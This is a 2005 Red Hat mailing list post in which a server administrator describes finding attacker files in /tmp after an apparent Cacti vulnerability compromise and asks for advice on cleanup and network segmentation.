Eris Caffee <mailto:eris-redhat-list@xxxxxxxxxxx> on Saturday, August 20, 2005 12:04 PM said: > For example, check to see > if your /tmp directory is mounted with the noexec and nosuid options. > Just enabling those options can prevent a lot of cracks since many > attacks rely on being able to exploit a weak cgi script to upload a > program into /tmp and run it. Key #1. > And, of course, cgi scripts are frequently a way for attackers to gain > access to your system. [snip] > You can use the list to see if you had any versions > of packages with known security holes, and you can use the logs, > especially the web server logs, to see if there were any strange web > requests around the time the crack occurred, such as someone running > a cgi-script with lot's of garbage characters on the request line. Key #2. Okay, so I looked into the /tmp directory and found ./shell.pl and ./.x. Upon further investigation I found http://linuxfr.org/~alis/ which details almost completely the same thing that happened to my sever. It turns out a known vulnerability in Cacti (which takes advantage of a misconfigured /tmp directory I presume) was used to gain access to the system. However, the difference between my server and the one detailed in the webpage is that I do not have anything in the /dev/shm directory nor do I have a user called www-data. I'm "assuming" at this point that the assailant(s) did not get as far as the webpage describes. According to my httpd log files it looks like the attack happened on Aug 16th. I didn't notice anything was wrong until Aug 19th when PuTTY started popping up a new DSA(?) SSH key for a server I'd been accessing for a very long time. It struck me as odd that even though I'm accessing the same server as usual, it would be creating a new key. The author of the webpage suspects that his server was used to send spam since he did not find any large data files (e.g. warez). I'm not sure if my server was used for anything at all. However, it's entirely possible that the Cacti exploit was only used to get into the box and the perp didn't intend to send spam or warez at all. Instead they may have had other things in mind. At this point I have not checked for a rootkit, though I plan to do that before I wipe the box. I also plan to segment the network so that even if the webserver is compromised the perp cannot sniff the rest of the network traffic and steal passwords/data. At least, that's how I think it would work. Let me know your thoughts. Thanks, Chris. -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
